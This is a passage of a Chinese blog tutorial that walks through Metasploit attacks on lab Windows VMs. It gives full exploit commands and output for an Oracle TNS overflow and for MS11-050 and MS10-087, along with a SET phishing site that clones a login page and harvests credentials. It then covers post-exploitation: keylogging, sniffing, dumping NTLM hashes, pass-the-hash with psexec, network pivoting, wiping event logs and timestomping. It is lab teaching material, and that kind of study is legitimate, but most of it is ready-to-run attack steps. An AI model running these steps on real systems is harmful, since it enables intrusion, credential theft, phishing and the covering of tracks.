[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Exploit completed, but no session was created.

提示“no session was created”,更换payload为windows/shell/bind_tcp

use exploit/windows/oracle/tns_auth_sesskey
set payload windows/shell/bind_tcp
set RHOSTS 10.10.10.130
set LHOST 10.10.10.128
set LPORT 4555
set target 1
exploit
msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit

[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Started bind TCP handler against 10.10.10.130:4555
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.130
[*] Command shell session 26 opened (10.10.10.128:3719 -> 10.10.10.130:4555 ) at 2022-04-23 20:10:07 +0800


Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----


C:\oracle\product\10.2.0\db_1\DATABASE>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 10.10.10.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.254

C:\oracle\product\10.2.0\db_1\DATABASE>systeminfo
systeminfo

Host Name:                 ROOT-TVI862UBEH
OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version:                5.2.3790 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          root
Registered Organization:
Product ID:                69713-640-9722366-45109
Original Install Date:     11/15/2011, 9:50:15 PM
System Up Time:            242 Days, 0 Hours, 52 Minutes, 4 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 14 Stepping 10 GenuineIntel ~2112 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     767 MB
Available Physical Memory: 67 MB
Page File: Max Size:       2,474 MB
Page File: Available:      1,295 MB
Page File: In Use:         1,179 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB893803v2 - Update
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.130

客户端渗透

MS11050

search ms11_050
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
set SRVHOST 0.0.0.0
set SRVPORT 8080
set LHOST 10.10.10.128
set LPORT 4444
set target 1
set URIPATH ms11050
exploit
msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Using URL: http://10.10.10.128:8080/ms11050
[*] Server started.

提示信息,攻击目标需要访问以下URL

http://10.10.10.128:8080/ms11050

因攻击目标内置IE6,非漏洞版本IE7,需要下载IE7后访问URL
https://www.download3k.com/Install-Internet-Explorer.html
https://www.microsoft.com/ja-jp/download/details.aspx?id=41071

在这里插入图片描述在这里插入图片描述在IE7中访问URL

http://10.10.10.128:8080/ms11050

Metasploit中接收到信息

[*] 192.168.10.128   ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...

没有获得权限,IE7安装程序可能存在问题

更换攻击目标为Windows 7 IE8后,浏览器崩溃,仍无法获得权限

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

MS10087

search ms10_087
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
set CMD calc.exe
set FILENAME ms10087.rtf
exploit
msf6 > search ms10_087

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank   Check  Description
   -  ----                                                    ---------------  ----   -----  -----------
   0  exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  No     MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec
payload => windows/exec
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
FILENAME => ms10087.rtf
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'ms10087.rtf' file ...
[+] ms10087.rtf stored at C:/Users/IDEA/.msf4/local/ms10087.rtf

提示信息显示文件路径

C:/Users/IDEA/.msf4/local/ms10087.rtf

在系统中找到这个文件,将这个文件复制到WinXP Metasploitable靶机中双击打开,攻击目标被诱导打开文件

WinXP Metasploitable在双击后会打开payload中设置的计算器程序
在这里插入图片描述

社会工程学

钓鱼网站

http://10.10.10.129/signin.html

在这里插入图片描述在Kali Linux中安装Set工具以用于仿造Web界面

apt-get -y install set

运行set

setoolkit
root@DESKTOP-9I2FBB4:~# setoolkit
              ________________________
              __  ___/__  ____/__  __/
              _____ \__  __/  __  /
              ____/ /_  /___  _  /
              /____/ /_____/  /_/

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
set>
 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

选择1) Social-Engineering Attacks

1

提示信息

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

选择2) Website Attack Vectors

2

提示信息

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

选择3) Credential Harvester Attack Method

3

提示信息

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

选择2) Site Cloner

2

提示信息

set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.10.10.128]:

提示信息

set:webattack> Enter the url to clone:

输入要克隆的URL

http://10.10.10.129/signin.html
set:webattack> Enter the url to clone:http://10.10.10.129/signin.html

[*] Cloning the website: http://10.10.10.129/signin.html
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

访问仿冒的URL

http://10.10.10.128/

在这里插入图片描述

提示信息

10.10.10.128 - - [17/Apr/2022 11:42:06] "GET / HTTP/1.1" 200 -

在仿冒的网页中输入用户名和口令
在这里插入图片描述输入完成后会跳转到真实的地址在这里插入图片描述
提示信息,获取到了在仿冒网页中输入的用户名和口令信息

[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=admin
POSSIBLE USERNAME FIELD FOUND: Login=Login
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

后渗透攻击

Metasploit后渗透攻击模块主要支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。Metasploit位于后渗透攻击阶段主要利用post(后渗透模块)。
post(后渗透模块):拿到权后,进一步对目标和内网进行渗透。

信息窃取

dumplinks模块获取近期操作和访问记录

run post/windows/gather/dumplinks
meterpreter > run post/windows/gather/dumplinks

[*] Running module against DH-CA8822AB9589
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\0927.pdf.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\1.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Copy of kingview.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IIS6.CAB.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IIS_XPSP3.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IMS.CAB.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\kingview.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KingView.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KVWebSvr.dll.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\msf.pdf.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document (2).txt.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document.txt (10).lnk.

enum_application模块获取安装软件、安全更新与漏洞补丁

run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on DH-CA8822AB9589

Installed Applications
======================

 Name                                    Version
 ----                                    -------
 Adobe Reader 9                          9.0.0
 KingView 6.53                           6.53
 KingView Driver                         6.53
 Microsoft Office Standard Edition 2003  11.0.8173.0
 Sentinel Protection Installer 7.5.0     7.5.0
 VMware Tools                            8.1.4.11056
 WebFldrs XP                             9.50.7523


[+] Results stored in: C:/Users/IDEA/.msf4/loot/20220417155003_default_192.168.10.128_host.application_916948.txt

keyscan获取键盘记录

keyscan_start
keyscan_dump
keyscan_stop

sniffer嗅探口令

use sniffer
sniffer_interfaces
sniffer_start 1
sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
sniffer_stop 1
meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 8 packets (1174 bytes)
[*] Downloaded 100% (1174/1174)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to C:UsersIDEADownloadscap1.pcap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 0 packets (0 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

enum_ie模块获取缓存IE浏览器中的口令

run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/enum_ie

[*] IE Version: 6.0.2900.5512
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
[*] Retrieving cookies.....
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...

hashdump获取系统密文口令

hashdump
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::

内网拓展

获取路由

run get_local_subnets
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.10.0/255.255.255.0

后台session

background
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DH-CA8822AB9589  192.168.10.1:24066 -> 192.168.10.128:5000  (192.168.10.128)

msf6 exploit(windows/smb/ms08_067_netapi) > sessions 1
[*] Starting interaction with 1...

meterpreter >

查看路由

route print

添加路由

route add 192.168.10.0 255.255.255.0 1
msf6 exploit(windows/smb/ms08_067_netapi) > route print
[*] There are currently no routes defined.
msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.10.0 255.255.255.0 1
[*] Route added
msf6 exploit(windows/smb/ms08_067_netapi) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.10.0       255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.

口令利用

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set LHOST 10.10.10.128
set LPORT 443
set RHOST 192.168.10.128
set SMBUser Administrator
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
exploit
msf6 > use exploit/windows/smb/psexec
[*] Using configured payload windows/upexec/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf6 exploit(windows/smb/psexec) > set LPORT 443
LPORT => 443
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.10.128
RHOST => 192.168.10.128
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > exploit

[*] 192.168.10.128:445 - Connecting to the server...
[*] 192.168.10.128:445 - Authenticating to 192.168.10.128:445 as user 'Administrator'...
[-] 192.168.10.128:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.

掩踪灭迹

清除日志痕迹

clearev
meterpreter > clearev
[*] Wiping 327 records from Application...
[*] Wiping 518 records from System...
[*] Wiping 0 records from Security...

掩饰修改的文件时间戳

timestomp

iCTF

环境概览

环境名称用途备注
iCTF 2011 ServerLinux靶机下载vmware虚拟机镜像

环境下载

链接: https://pan.baidu.com/s/1KYRLKW1iRS-YfSoM-xlMdg?pwd=ju8g
提取码: ju8g

  • 3
    点赞
  • 17
    收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:游动-白 设计师:我叫白小胖 返回首页
评论 2

打赏作者

-一脸懵逼-

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值